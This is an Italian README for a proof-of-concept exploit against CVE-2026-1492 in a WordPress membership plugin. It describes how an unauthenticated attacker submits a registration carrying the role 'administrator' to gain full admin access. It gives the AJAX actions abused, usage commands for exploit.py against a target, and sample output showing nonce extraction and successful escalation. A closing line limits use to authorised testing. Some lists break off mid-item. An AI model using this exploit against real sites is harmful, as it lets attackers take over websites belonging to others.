
Proof-of-concept exploit per CVE-2026-1492 nel plugin WordPress User Registration, che consente l'escalation dei privilegi non autenticata ad amministratore tramite una registrazione di appartenenza appositamente predisposta.
Questo repository contiene un proof-of-concept per lo sfruttamento di CVE-2026-1492, una vulnerabilità critica che interessa il plugin WordPress User Registration & Membership.
La vulnerabilità consente a attaccanti non autenticati di creare account amministratore abusando del processo di registrazione all'abbonamento.
👉 Un'analisi tecnica completa di questa vulnerabilità è disponibile qui:
Analisi Tecnica
Spiega passo dopo passo come il backend elabora i dati controllati dall'attaccante e perché l'escalation dei privilegi è possibile.
Il plugin si fida impropriamente dell'input controllato dall'utente durante il processo di registrazione all'abbonamento.
Nello specifico:
role fornito dall'utenteQuesto consente agli attaccanti di impostare:
"role": "administrator"
e ottenere pieno accesso amministrativo.
Lo sfruttamento riuscito consente:
La vulnerabilità viene attivata tramite un processo AJAX in più passaggi:
user_registration_user_form_submituser_registration_membership_register_memberadministrator)python3 exploit.py -t http://target -ru 'http://target/?page_id=6'
python3 exploit.py -t http://localhost:5000 -ru 'http://localhost:5000/?page_id=6'
[*] Estrazione dei token...
[+] form_id: 5
[+] frontend_nonce: XXXXX
[+] security: XXXXX
[+] wpnonce: XXXXX
[+] membership_id: 12
[*] Invio della richiesta di registrazione...
[+] Utente creato
[*] Invio della richiesta di abbonamento...
[+] Escalation dei privilegi riuscita
Accedi utilizzando le credenziali generate:
http://target/wp-login.php
Poi accedi al pannello admin:
http://target/wp-admin/
Nota: Il percorso admin potrebbe essere personalizzato.
Questo exploit è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati.
Non utilizzarlo contro sistemi senza autorizzazione.